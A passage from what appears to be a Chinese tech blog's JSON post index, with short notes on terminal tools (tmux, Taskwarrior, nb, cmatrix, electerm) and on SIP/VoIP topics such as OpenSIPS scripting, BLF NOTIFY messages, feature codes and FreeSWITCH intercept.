it\u0026rsquo;s because of a utility called path_helper that\u0026rsquo;s run from your /etc/profile file.\nYou can\u0026rsquo;t easily persuade tmux (or rather, bash) not to source /etc/profile (for some reason tmux always runs as a login shell, which means /etc/profile will be read), but you can make sure that the effects of path_helper don\u0026rsquo;t screw with your PATH.","title":"matplotlib图片弹窗没有弹出"},{"content":"参考 http://coding-geek.com/how-shazam-works/ https://blog.csdn.net/yutianzuijin/article/details/49787551 http://hpac.cs.umu.se/teaching/sem-mus-17/Reports/Froitzheim.pdf https://github.com/sfluor/musig ","permalink":"https://wdd.js.org/posts/2021/03/phgwbe/","summary":"参考 http://coding-geek.com/how-shazam-works/ https://blog.csdn.net/yutianzuijin/article/details/49787551 http://hpac.cs.umu.se/teaching/sem-mus-17/Reports/Froitzheim.pdf https://github.com/sfluor/musig ","title":"#shazam算法分析"},{"content":"安装 sudo apt install cmatrix 帮助文档 ➜ ~ cmatrix --help Usage: cmatrix -[abBcfhlsmVx] [-u delay] [-C color] -a: Asynchronous scroll -b: Bold characters on -B: All bold characters (overrides -b) -c: Use Japanese characters as seen in the original matrix. Requires appropriate fonts -f: Force the linux $TERM type to be on -l: Linux mode (uses matrix console font) -L: Lock mode (can be closed from another terminal) -o: Use old-style scrolling -h: Print usage and exit -n: No bold characters (overrides -b and -B, default) -s: \u0026#34;Screensaver\u0026#34; mode, exits on first keystroke -x: X window mode, use if your xterm is using mtx.pcf -V: Print version information and exit -u delay (0 - 10, default 4): Screen update delay -C [color]: Use this color for matrix (default green) -r: rainbow mode -m: lambda mode ","permalink":"https://wdd.js.org/posts/2021/03/fgutiw/","summary":"安装 sudo apt install cmatrix 帮助文档 ➜ ~ cmatrix --help Usage: cmatrix -[abBcfhlsmVx] [-u delay] [-C color] -a: Asynchronous scroll -b: Bold characters on -B: All bold characters (overrides -b) -c: Use Japanese characters as seen in the original matrix. Requires appropriate fonts -f: Force the linux $TERM type to be on -l: Linux mode (uses matrix console font) -L: Lock mode (can be closed from another terminal) -o: Use old-style scrolling -h: Print usage and exit -n: No bold characters (overrides -b and -B, default) -s: \u0026#34;Screensaver\u0026#34; mode, exits on first keystroke -x: X window mode, use if your xterm is using mtx.","title":"黑客帝国终端字符瀑布"},{"content":"nb是一个基于命令行的笔记本工具,功能很强大。\n记笔记何须离开终端?\n特点 plain-text data storage, encryption, filtering and search, Git-backed versioning and syncing, Pandoc-backed conversion, global and local notebooks, customizable color themes, extensibility through plugins, 支持各种编辑器打开笔记, 我自然用VIM了。\nA text editor with command line support, such as:Vim,Emacs,Visual Studio Code,Sublime Text,micro,nano,Atom,TextMate,MacDown,some of these,and many of these.\n使用体验截图 参考 https://xwmx.github.io/nb/ https://github.com/xwmx/nb ","permalink":"https://wdd.js.org/posts/2021/03/dtas0p/","summary":"nb是一个基于命令行的笔记本工具,功能很强大。\n记笔记何须离开终端?\n特点 plain-text data storage, encryption, filtering and search, Git-backed versioning and syncing, Pandoc-backed conversion, global and local notebooks, customizable color themes, extensibility through plugins, 支持各种编辑器打开笔记, 我自然用VIM了。\nA text editor with command line support, such as:Vim,Emacs,Visual Studio Code,Sublime Text,micro,nano,Atom,TextMate,MacDown,some of these,and many of these.\n使用体验截图 参考 https://xwmx.github.io/nb/ https://github.com/xwmx/nb ","title":"命令行笔记本 nb 记笔记何须离开终端?"},{"content":"简介 Taskwarrior是命令行下的todolist, 特点是快速高效且功能强大,\n支持项目组 支持燃烧图 支持各种类似SQL的语法过滤 支持各种统计报表 安装 sudo apt-get install taskwarrior 使用说明 增加Todo task add 分机注册测试 due:today Created task 1. 显示TodoList ➜ ~ task list ID Age Due Description Urg 1 5s 2021-03-25 分机注册测试 8.98 开始一个任务 ➜ ~ task 1 start Starting task 1 \u0026#39;分机注册测试\u0026#39;. Started 1 task. ➜ ~ task ls ID A Due Description 1 * 9h 分机注册测试 标记完成一个任务 ➜ ~ task 1 done Completed task 1 \u0026#39;分机注册测试\u0026#39;. Completed 1 task. # 任务完成后 task ls将不会显示已经完成的任务 ➜ ~ task ls No matches. # 可以使用task all 查看所有的todolist ➜ ~ task all ID St UUID A Age Done Project Due Description - C 341a0f48 2min 55s 2021-03-25 分机注册测试 燃烧图 # 按天的燃烧图 task burndown.daily # 按月的燃烧图 task burndown.monthly # 按周的燃烧图 task burndown.weekly 日历 task calendar 更多介绍 更多好玩的东西,可以去看看官方的使用说明文档 https://taskwarrior.org/docs/\n参考 https://taskwarrior.org/ 更多命令 https://taskwarrior.org/docs/commands/ ","permalink":"https://wdd.js.org/posts/2021/03/yyz3ca/","summary":"简介 Taskwarrior是命令行下的todolist, 特点是快速高效且功能强大,\n支持项目组 支持燃烧图 支持各种类似SQL的语法过滤 支持各种统计报表 安装 sudo apt-get install taskwarrior 使用说明 增加Todo task add 分机注册测试 due:today Created task 1. 显示TodoList ➜ ~ task list ID Age Due Description Urg 1 5s 2021-03-25 分机注册测试 8.98 开始一个任务 ➜ ~ task 1 start Starting task 1 \u0026#39;分机注册测试\u0026#39;. Started 1 task. ➜ ~ task ls ID A Due Description 1 * 9h 分机注册测试 标记完成一个任务 ➜ ~ task 1 done Completed task 1 \u0026#39;分机注册测试\u0026#39;.","title":"Taskwarrior 命令行下的专业TodoList神器"},{"content":"https://electerm.github.io/electerm/\n功能特点 Work as a terminal/file manager or ssh/sftp client(similar to xshell) Global hotkey to toggle window visibility (simliar to guake, default is ctrl + 2) Multi platform(linux, mac, win) 🇺🇸 🇨🇳 🇧🇷 🇷🇺 🇪🇸 🇫🇷 🇹🇷 🇭🇰 🇯🇵 Support multi-language(electerm-locales, contribute/fix welcome) Double click to directly edit remote file(small ones). Edit local file with built-in editor(small ones). Auth with publickey + password. Zmodem(rz, sz). Transparent window(Mac, win). Terminal background image. Global/session proxy. Quick commands Sync bookmarks/themes/quick commands to github/gitee secret gist Serial Port support(removed after version 1.10.14) Quick input to one or all terminal Command line usage: check wiki ","permalink":"https://wdd.js.org/posts/2021/03/tigv1h/","summary":"https://electerm.github.io/electerm/\n功能特点 Work as a terminal/file manager or ssh/sftp client(similar to xshell) Global hotkey to toggle window visibility (simliar to guake, default is ctrl + 2) Multi platform(linux, mac, win) 🇺🇸 🇨🇳 🇧🇷 🇷🇺 🇪🇸 🇫🇷 🇹🇷 🇭🇰 🇯🇵 Support multi-language(electerm-locales, contribute/fix welcome) Double click to directly edit remote file(small ones). Edit local file with built-in editor(small ones). Auth with publickey + password. Zmodem(rz, sz). Transparent window(Mac, win). Terminal background image.","title":"electerm 免费开源跨平台且功能强大的ssh工具"},{"content":"xcode-select --install 参考 https://www.jianshu.com/p/50b6771eb853 ","permalink":"https://wdd.js.org/posts/2021/03/ibv4tb/","summary":"xcode-select --install 参考 https://www.jianshu.com/p/50b6771eb853 ","title":"mac升级后命令行报错 xcrun: error: invalid active developer path"},{"content":"if if (expr) { actions } else { actions; } if (expr) { actions } else if (expr) { actions; } 表达式操作符号 常用的用黄色标记。\n== 等于 != 不等于 =~ 正则匹配 $rU =~ '^1800*' is \u0026ldquo;$rU begins with 1800\u0026rdquo; !~ 正则不匹配 大于\n= 大于等于\n\u0026lt; 小于 \u0026lt;= 小于等于 \u0026amp;\u0026amp; 逻辑与 **|| **逻辑或 **! **逻辑非 [ \u0026hellip; ] - test operator - inside can be any arithmetic expression 其他 出了常见的if语句,opensips还支持switch, while, for each, 因为用的比较少。各位可以看官方文档说明。\nhttps://www.opensips.org/Documentation/Script-Statements-2-4\n","permalink":"https://wdd.js.org/opensips/ch5/statement/","summary":"if if (expr) { actions } else { actions; } if (expr) { actions } else if (expr) { actions; } 表达式操作符号 常用的用黄色标记。\n== 等于 != 不等于 =~ 正则匹配 $rU =~ '^1800*' is \u0026ldquo;$rU begins with 1800\u0026rdquo; !~ 正则不匹配 大于\n= 大于等于\n\u0026lt; 小于 \u0026lt;= 小于等于 \u0026amp;\u0026amp; 逻辑与 **|| **逻辑或 **! **逻辑非 [ \u0026hellip; ] - test operator - inside can be any arithmetic expression 其他 出了常见的if语句,opensips还支持switch, while, for each, 因为用的比较少。各位可以看官方文档说明。","title":"常用语句"},{"content":"使用return(int)语句可以返回整数值。\nreturn(0) 相当于exit(), 后续的路由都不在执行 return(正整数) 后续的路由还会继续执行,if测试为true return(负整数) 后续的路由还会继续执行, if测试为false 可以使用 $rc 或者 $retcode 获取上一个路由的返回值 # 请求路由 route{ route(check_is_feature_code); xlog(\u0026#34;check_is_feature_code return code is $rc\u0026#34;); ... ... route(some_other_check); } route[check_is_feature_code]{ if ($rU !~ \u0026#34;^\\*[0-9]+\u0026#34;) { xlog(\u0026#34;check_is_feature_code: is not feature code $rU\u0026#34;); # 非feature code, 提前返回 return(1); } # 下面就是feature code的处理 ...... } route[some_other_check]{ ... } ","permalink":"https://wdd.js.org/opensips/ch5/return/","summary":"使用return(int)语句可以返回整数值。\nreturn(0) 相当于exit(), 后续的路由都不在执行 return(正整数) 后续的路由还会继续执行,if测试为true return(负整数) 后续的路由还会继续执行, if测试为false 可以使用 $rc 或者 $retcode 获取上一个路由的返回值 # 请求路由 route{ route(check_is_feature_code); xlog(\u0026#34;check_is_feature_code return code is $rc\u0026#34;); ... ... route(some_other_check); } route[check_is_feature_code]{ if ($rU !~ \u0026#34;^\\*[0-9]+\u0026#34;) { xlog(\u0026#34;check_is_feature_code: is not feature code $rU\u0026#34;); # 非feature code, 提前返回 return(1); } # 下面就是feature code的处理 ...... } route[some_other_check]{ ... } ","title":"使用return语句减少逻辑嵌套"},{"content":"$ru $rU 可读可写以下面的sip URL举例\nsip:8001@test.cc;a=1;b=2 $ru 代表整个sip url就是 sip:8001@test.cc;a=1;b=2 $rU代表用户部分,就是8001 **\n$du 可读可写\n$du = \u0026#34;sip:192.468.2.40\u0026#34;; $du可以理解为外呼代理,我们想让这个请求发到下一个sip服务器,就把$du设置为下一跳的地址。\n","permalink":"https://wdd.js.org/opensips/ch5/core-var/","summary":"$ru $rU 可读可写以下面的sip URL举例\nsip:8001@test.cc;a=1;b=2 $ru 代表整个sip url就是 sip:8001@test.cc;a=1;b=2 $rU代表用户部分,就是8001 **\n$du 可读可写\n$du = \u0026#34;sip:192.468.2.40\u0026#34;; $du可以理解为外呼代理,我们想让这个请求发到下一个sip服务器,就把$du设置为下一跳的地址。","title":"核心变量说明"},{"content":"header部分\n\u0026lt;meta property=\u0026#34;og:image\u0026#34; content=\u0026#34;http://abc.cc/x.jpg\u0026#34; /\u0026gt; body部分\n\u0026lt;div style=\u0026#34;display:none\u0026#34;\u0026gt; \u0026lt;img src=\u0026#34;http://abc.cc/x.jpg\u0026#34;\u0026gt; \u0026lt;/div\u0026gt; 注意,图片的连接,必须是绝对地址。就是格式必需以http开头的地址,不能用相对地址,否则缩略图不会显示。\n","permalink":"https://wdd.js.org/posts/2021/03/rggbsl/","summary":"header部分\n\u0026lt;meta property=\u0026#34;og:image\u0026#34; content=\u0026#34;http://abc.cc/x.jpg\u0026#34; /\u0026gt; body部分\n\u0026lt;div style=\u0026#34;display:none\u0026#34;\u0026gt; \u0026lt;img src=\u0026#34;http://abc.cc/x.jpg\u0026#34;\u0026gt; \u0026lt;/div\u0026gt; 注意,图片的连接,必须是绝对地址。就是格式必需以http开头的地址,不能用相对地址,否则缩略图不会显示。","title":"网页分享到微信添加缩略图"},{"content":"测试目标服务器 http://www.websocket-test.com/, 该服务器使用的是未加密的ws协议。\n打开这个页面,可以看到这个页面发起了连接到ws://121.40.165.18:8800/ 的websocket连接。\n然后看下里面的消息,都是服务端向客户端发送的消息。\n通过wireshark分析\n单独的websocket也是能够看到服务端下发的消息的。\nkeepalive 要点关注 每隔大约45秒,客户端会像服务端发送一个keep alive包。服务端也会非常快的回复一个心跳包 ","permalink":"https://wdd.js.org/network/pz06t2/","summary":"测试目标服务器 http://www.websocket-test.com/, 该服务器使用的是未加密的ws协议。\n打开这个页面,可以看到这个页面发起了连接到ws://121.40.165.18:8800/ 的websocket连接。\n然后看下里面的消息,都是服务端向客户端发送的消息。\n通过wireshark分析\n单独的websocket也是能够看到服务端下发的消息的。\nkeepalive 要点关注 每隔大约45秒,客户端会像服务端发送一个keep alive包。服务端也会非常快的回复一个心跳包 ","title":"websocket tcp keepalive 机制调研"},{"content":"功能描述 用户可以拨打一个特殊的号码,用来触发特定的功能。常见的功能码一般以 * 开头,例如\n*1 组内代接 *1(EXT) 代接指定的分机 *2 呼叫转移 **87 请勿打扰 \u0026hellip; 上面的栗子,具体的功能码,对应的业务逻辑是可配置的。\n场景举例 我的分机是8001,我看到8008的分机正在振铃,此时我需要把电话接起来。但是我不能走到8008的工位上去接电话,我必须要在自己的工位上接电话。\n那么我在自己的分机上输入*18008 这时SIP服务端就知道你想代8008接听正在振铃的电话。\n说起来功能码就是一种使用话机上按键的一组暗号。\n话机上一般只有0-9*#,一共12个按键。没法办用其他的编码告诉服务端自己想做什么,所以只能用功能码。\n参考 https://www.ipcomms.net/support/myoffice-pbx/feature-codes https://www.cisco.com/c/en/us/td/docs/voice_ip_comm/cucme/admin/configuration/manual/cmeadm/cmefacs.pdf https://help.yeastar.com/en/s-series/topic/feature_code.html?hl=feature%2Ccode\u0026amp;_ga=2.76562834.622619423.1615949948-1155631884.1615949948 ","permalink":"https://wdd.js.org/opensips/ch9/feature-code/","summary":"功能描述 用户可以拨打一个特殊的号码,用来触发特定的功能。常见的功能码一般以 * 开头,例如\n*1 组内代接 *1(EXT) 代接指定的分机 *2 呼叫转移 **87 请勿打扰 \u0026hellip; 上面的栗子,具体的功能码,对应的业务逻辑是可配置的。\n场景举例 我的分机是8001,我看到8008的分机正在振铃,此时我需要把电话接起来。但是我不能走到8008的工位上去接电话,我必须要在自己的工位上接电话。\n那么我在自己的分机上输入*18008 这时SIP服务端就知道你想代8008接听正在振铃的电话。\n说起来功能码就是一种使用话机上按键的一组暗号。\n话机上一般只有0-9*#,一共12个按键。没法办用其他的编码告诉服务端自己想做什么,所以只能用功能码。\n参考 https://www.ipcomms.net/support/myoffice-pbx/feature-codes https://www.cisco.com/c/en/us/td/docs/voice_ip_comm/cucme/admin/configuration/manual/cmeadm/cmefacs.pdf https://help.yeastar.com/en/s-series/topic/feature_code.html?hl=feature%2Ccode\u0026amp;_ga=2.76562834.622619423.1615949948-1155631884.1615949948 ","title":"SIP feature codes SIP功能码"},{"content":"FS的 call pickup功能,就是用intercept功能。\n一个呼叫一般有两个leg, intercept一般是把自己bridge其中一个leg,另外一个leg会挂断。 intercept默认是bridge legA, 挂断legB。通过参数也可以指定来bridge legB,挂断legA。\n从一个简单的场景说起。A拨打B分机。\n从FS的角度来说,有以下两条腿。\n通过分析日志可以发现:具有replaces这种头的invite,fs没有走路由,而是直接用了intercept拦截。\nNew Channel sofia/external/8003@wdd.cc [6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1]2021-03-15 10:42:47.380797 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8001@wdd.cc [34dc4095-3bac-4f7d-8be4-1ed5ed2f06b4]\n2021-03-15 10:42:51.520800 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8004@wdd.cc [03e78837-1413-4b77-ba4c-e753fed55ebe]2021-03-15 10:42:51.520800 [DEBUG] switch_core_state_machine.c:585 (sofia/external/8004@wdd.cc) Running State Change CS_NEW (Cur 3 Tot 163)2021-03-15 10:42:51.520800 [DEBUG] sofia.c:10279 sofia/external/8004@wdd.cc receiving invite from 192.168.2.109:18627 version: 1.10.3-release 32bit2021-03-15 10:42:51.520800 [DEBUG] sofia.c:11640 call 6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1 intercepted2021-03-15 10:42:51.520800 [DEBUG] sofia.c:7325 Channel sofia/external/8004@wdd.cc entering state [received][100]\nEXECUTE [depth=0] sofia/external/8004@wdd.cc intercept(6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1)\n常见的使用场景:\n某个电话正在振铃,但是没人接。如果我的话机通过BLF监控了这个分机,就可以通过按键来用我自己的话机代接正在振铃的话机。 参考 https://www.yuque.com/wangdd/fyikfz/lawr6v https://www.yuque.com/wangdd/fyikfz/lawr6v ","permalink":"https://wdd.js.org/freeswitch/intercept/","summary":"FS的 call pickup功能,就是用intercept功能。\n一个呼叫一般有两个leg, intercept一般是把自己bridge其中一个leg,另外一个leg会挂断。 intercept默认是bridge legA, 挂断legB。通过参数也可以指定来bridge legB,挂断legA。\n从一个简单的场景说起。A拨打B分机。\n从FS的角度来说,有以下两条腿。\n通过分析日志可以发现:具有replaces这种头的invite,fs没有走路由,而是直接用了intercept拦截。\nNew Channel sofia/external/8003@wdd.cc [6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1]2021-03-15 10:42:47.380797 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8001@wdd.cc [34dc4095-3bac-4f7d-8be4-1ed5ed2f06b4]\n2021-03-15 10:42:51.520800 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8004@wdd.cc [03e78837-1413-4b77-ba4c-e753fed55ebe]2021-03-15 10:42:51.520800 [DEBUG] switch_core_state_machine.c:585 (sofia/external/8004@wdd.cc) Running State Change CS_NEW (Cur 3 Tot 163)2021-03-15 10:42:51.520800 [DEBUG] sofia.c:10279 sofia/external/8004@wdd.cc receiving invite from 192.168.2.109:18627 version: 1.10.3-release 32bit2021-03-15 10:42:51.520800 [DEBUG] sofia.c:11640 call 6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1 intercepted2021-03-15 10:42:51.520800 [DEBUG] sofia.c:7325 Channel sofia/external/8004@wdd.cc entering state [received][100]\nEXECUTE [depth=0] sofia/external/8004@wdd.","title":"FS intercept拦截"},{"content":"rfc http://www.rfcreader.com/\nrfcreader是一个在线的网站,可以阅读和搜索rfc文档。\n另外也具有一些非常好用的功能\n支持账号登录,收藏自己喜欢的rfc文档 可以对rfc进行标记,评论。 有良好的目录 支持书签 等等。。。。 ","permalink":"https://wdd.js.org/posts/2021/03/mcbqod/","summary":"rfc http://www.rfcreader.com/\nrfcreader是一个在线的网站,可以阅读和搜索rfc文档。\n另外也具有一些非常好用的功能\n支持账号登录,收藏自己喜欢的rfc文档 可以对rfc进行标记,评论。 有良好的目录 支持书签 等等。。。。 ","title":"RFC阅读神器 rfcreader"},{"content":"参考: https://github.com/gpakosz/.tmux\n优点:\n界面非常漂亮,有很多指示图标,能够实时的查看系统状态,session和window信息 快捷键非常合理,非常好用 cd git clone https://gitee.com/wangduanduan/tmux.git mv tmux .tmux ln -s -f .tmux/.tmux.conf cp .tmux/.tmux.conf.local . 微调配置 启用ctrl+a光标定位到行首 默认情况下,ctrl+a被配置成和ctrl+b的功能相同,但是大多数场景下,ctrl+a是readline的光标回到行首的快捷键,\n所以我们需要恢复ctrl+a的原有功能。\n只需要把下面的两行取消注释\nset -gu prefix2 unbind C-a 复制模式支持jk上下移动 set -g mode-keys vi 在相同的目录打开新的窗口或者标签页 tmux_conf_new_window_retain_current_path=true tmux_conf_new_pane_retain_current_path=true 隐藏系统运行时间信息 状态栏的系统运行时长似乎没什么用,可以隐藏\ntmux_conf_theme_status_left=\u0026#34; ❐ #S \u0026#34; ","permalink":"https://wdd.js.org/posts/2021/03/yroxga/","summary":"参考: https://github.com/gpakosz/.tmux\n优点:\n界面非常漂亮,有很多指示图标,能够实时的查看系统状态,session和window信息 快捷键非常合理,非常好用 cd git clone https://gitee.com/wangduanduan/tmux.git mv tmux .tmux ln -s -f .tmux/.tmux.conf cp .tmux/.tmux.conf.local . 微调配置 启用ctrl+a光标定位到行首 默认情况下,ctrl+a被配置成和ctrl+b的功能相同,但是大多数场景下,ctrl+a是readline的光标回到行首的快捷键,\n所以我们需要恢复ctrl+a的原有功能。\n只需要把下面的两行取消注释\nset -gu prefix2 unbind C-a 复制模式支持jk上下移动 set -g mode-keys vi 在相同的目录打开新的窗口或者标签页 tmux_conf_new_window_retain_current_path=true tmux_conf_new_pane_retain_current_path=true 隐藏系统运行时间信息 状态栏的系统运行时长似乎没什么用,可以隐藏\ntmux_conf_theme_status_left=\u0026#34; ❐ #S \u0026#34; ","title":"oh my tmux tmux的高级定制"},{"content":"BLF功能简介 BLF是busy lamp field的缩写。一句话介绍就是,一个分机可以监控另一个分机的呼叫状态,状态可以通过分机上的指示灯来表示。\n例如:分机A通过配置过后,监控了分机B。\n如果分机B没有通话,那么分机A上的指示灯显示绿色 如果分机B上有一个呼叫正在振铃,那么分机A指示灯红色灯闪烁 如果分机B正在打电话,那么分机A的指示灯显示红色 这个功能的使用场景往往时例如秘书B监控了老板A的话机,在秘书把电话转给老板之前,可以通过自己电话上的指示灯,来判断老板有没有在打电话,如果没有再打电话,才可以把电话转过去。\n信令实现逻辑 信令分析 空闲通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKfef7.27d86e6.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 1 NOTIFY Call-ID: 1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 140 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=120 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;\u0026gt;\u0026lt;/dialog-info\u0026gt; 通话通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKcef7.91c1e716.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 2 NOTIFY Call-ID: 1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 466 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=108 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt;\u0026lt;dialog id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgx 9N\u0026#34; call-id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgxtp9N\u0026#34; direction=\u0026#34;recipient\u0026#34;\u0026gt;\u0026lt;state\u0026gt;confirmed\u0026lt;/state\u0026gt;\u0026lt;remote\u0026gt;\u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:8001@ d.cc\u0026#34;/\u0026gt;\u0026lt;/remote\u0026gt;\u0026lt;local\u0026gt;\u0026lt;identity\u0026gt;sip:9999@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt;\u0026lt;/local\u0026gt;\u0026lt;/dialog\u0026gt;\u0026lt;/dialog-info\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt; \u0026lt;dialog id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgx 9N\u0026#34; call-id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgxtp9N\u0026#34; direction=\u0026#34;recipient\u0026#34;\u0026gt; \u0026lt;state\u0026gt;confirmed\u0026lt;/state\u0026gt; \u0026lt;remote\u0026gt; \u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt; \u0026lt;target uri=\u0026#34;sip:8001@wdd.cc\u0026#34;/\u0026gt; \u0026lt;/remote\u0026gt; \u0026lt;local\u0026gt; \u0026lt;identity\u0026gt;sip:9999@wdd.cc\u0026lt;/identity\u0026gt; \u0026lt;target uri=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;/local\u0026gt; \u0026lt;/dialog\u0026gt; \u0026lt;/dialog-info\u0026gt; 请求体的格式说明参见:https://tools.ietf.org/html/rfc4235#section-4\n挂断Body \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:8001@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt;\u0026lt;dialog id=\u0026#34;45f1115c-fc32-1239-7198-b827 6c4366\u0026#34; call-id=\u0026#34;45f1115c-fc32-1239-7198-b827eb6c4366\u0026#34; direction=\u0026#34;recipient\u0026#34;\u0026gt;\u0026lt;state\u0026gt;terminated\u0026lt;/state\u0026gt;\u0026lt;remote\u0026gt;\u0026lt;identity\u0026gt;sip:0000000000@192.168.2.53\u0026lt;/identity\u0026gt;\u0026lt; rget uri=\u0026#34;sip:0000000000@192.168.2.53\u0026#34;/\u0026gt;\u0026lt;/remote\u0026gt;\u0026lt;local\u0026gt;\u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:8001@wdd.cc\u0026#34;/\u0026gt;\u0026lt;/local\u0026gt;\u0026lt;/dialog\u0026gt;\u0026lt;/dialog-info\u0026gt; 参考 https://www.opensips.org/Documentation/Tutorials-Presence-PuaDialoinfoConfig https://www.yuque.com/wangdd/fyikfz/qs2vqx https://tools.ietf.org/html/rfc4235 ","permalink":"https://wdd.js.org/opensips/ch9/blf-note/","summary":"BLF功能简介 BLF是busy lamp field的缩写。一句话介绍就是,一个分机可以监控另一个分机的呼叫状态,状态可以通过分机上的指示灯来表示。\n例如:分机A通过配置过后,监控了分机B。\n如果分机B没有通话,那么分机A上的指示灯显示绿色 如果分机B上有一个呼叫正在振铃,那么分机A指示灯红色灯闪烁 如果分机B正在打电话,那么分机A的指示灯显示红色 这个功能的使用场景往往时例如秘书B监控了老板A的话机,在秘书把电话转给老板之前,可以通过自己电话上的指示灯,来判断老板有没有在打电话,如果没有再打电话,才可以把电话转过去。\n信令实现逻辑 信令分析 空闲通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKfef7.27d86e6.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 1 NOTIFY Call-ID: 1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 140 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=120 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;\u0026gt;\u0026lt;/dialog-info\u0026gt; 通话通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKcef7.91c1e716.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 2 NOTIFY Call-ID: 1-774753@127.","title":"BLF功能笔记"},{"content":"https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9\n1. Load Balancing in OpenSIPS The \u0026ldquo;load-balancing\u0026rdquo; module comes to provide traffic routing based on load. Shortly, when OpenSIPS routes calls to a set of destinations, it is able to keep the load status (as number of ongoing calls) of each destination and to choose to route to the less loaded destination (at that moment). OpenSIPS is aware of the capacity of each destination - it is pre-configured with the maximum load accepted by the destinations. To be more precise, when routing, OpenSIPS will consider the less loaded destination not the destination with the smallest number of ongoing calls, but the destination with the largest available slot.\nAlso, the \u0026ldquo;load-balancing\u0026rdquo; (LB) module is able to receive feedback from the destinations (if they are capable of). This mechanism is used for notifying 